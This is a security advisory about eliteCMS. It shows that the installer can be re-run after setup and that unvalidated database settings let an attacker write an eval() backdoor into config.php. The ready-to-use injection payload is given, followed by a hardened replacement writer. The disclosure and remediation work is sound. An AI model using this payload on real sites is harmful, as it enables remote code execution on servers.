eliteCMS's installer is not locked once installation has finished, so an attacker can open the installer URL and run the installation again.
Another vulnerability: the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the session values (copied straight from POST, see below) are
    // interpolated into the double-quoted literal with no escaping at all
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the assembled text is written to config.php as-is
    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation whatsoever.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.

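As an added example, not part of the original post and not eliteCMS's own code, here is a hardened replacement for the step-4 config writer. It addresses both problems at once: an install lock file makes the installer refuse to run again, and submitted values are checked against an allowlist and emitted with var_export(), so a quote character can no longer terminate the generated string literal and a close tag can no longer leave PHP mode, which is how POSTed data reaches the parser as code instead of as a string. The lock-file path, the function names and the allowlist patterns are my own assumptions.

```php
<?php
// Added example, not eliteCMS code: a hardened version of the installer's
// step-4 config writer. The lock-file path, function names and allowlist
// patterns are assumptions made for this example.

const INSTALL_LOCK = __DIR__ . '/install.lock';

// Every installer step should call this first; once installation has
// finished, the installer refuses to run again.
function installerIsLocked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Allowlist validation. Host, database and user names get strict patterns
// that exclude quotes, whitespace, the PHP close tag and anything else that
// does not belong in a MySQL setting. The password is free-form (it may
// legitimately contain punctuation) and is made safe by var_export() below.
function validateDbSettings(array $in): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/', // host or host:port
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',                  // MySQL identifier
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    $out = [];
    foreach ($rules as $key => $pattern) {
        $value = isset($in[$key]) ? (string) $in[$key] : '';
        if (!preg_match($pattern, $value)) {
            throw new InvalidArgumentException("$key contains disallowed characters");
        }
        $out[$key] = $value;
    }
    $out['DB_PASS'] = isset($in['DB_PASS']) ? (string) $in['DB_PASS'] : '';
    return $out;
}

// Generate config.php. var_export() emits a single-quoted PHP literal with
// ' and \ escaped, so no submitted value can close the literal or open a
// new PHP block; the original installer interpolated the raw value into a
// double-quoted string instead.
function buildConfig(array $db): string
{
    $lines = ['<?php', '// generated by the installer; do not edit by hand'];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $lines[] = sprintf("define('%s', %s);", $key, var_export($db[$key], true));
    }
    // No PHP close tag at the end: anything after it would be sent as output.
    return implode("\n", $lines) . "\n";
}

// The replacement for the step-4 branch: lock check, validation, atomic
// write via temp file and rename, then lock the installer.
function writeConfig(string $path, array $post): void
{
    if (installerIsLocked()) {
        http_response_code(403);
        exit('Installer is locked; delete install.lock to reinstall.');
    }
    $db  = validateDbSettings($post);
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, buildConfig($db), LOCK_EX) === false || !rename($tmp, $path)) {
        throw new RuntimeException("could not write $path");
    }
    file_put_contents(INSTALL_LOCK, date('c') . "\n", LOCK_EX);
}

// Constructed demonstration input. The database name from the post is
// rejected by the allowlist, and a password full of quotes and close tags
// still comes out as one harmless string literal.
try {
    validateDbSettings([
        'DB_SERVER' => 'localhost',
        'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
        'DB_USER'   => 'root',
    ]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo buildConfig(validateDbSettings([
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => 'elitecms',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 'p"?><?php echo 1;?>\'x',
]));
```

The lock check belongs at the top of every installer step, not only the one that writes config.php, otherwise an earlier step can still be replayed to change the session values. On a site that was installed with the original installer, a quick check is to open admin/includes/config.php and confirm it contains nothing beyond the four define() lines and the connection code shown above; any extra PHP block there is a sign the installer was abused.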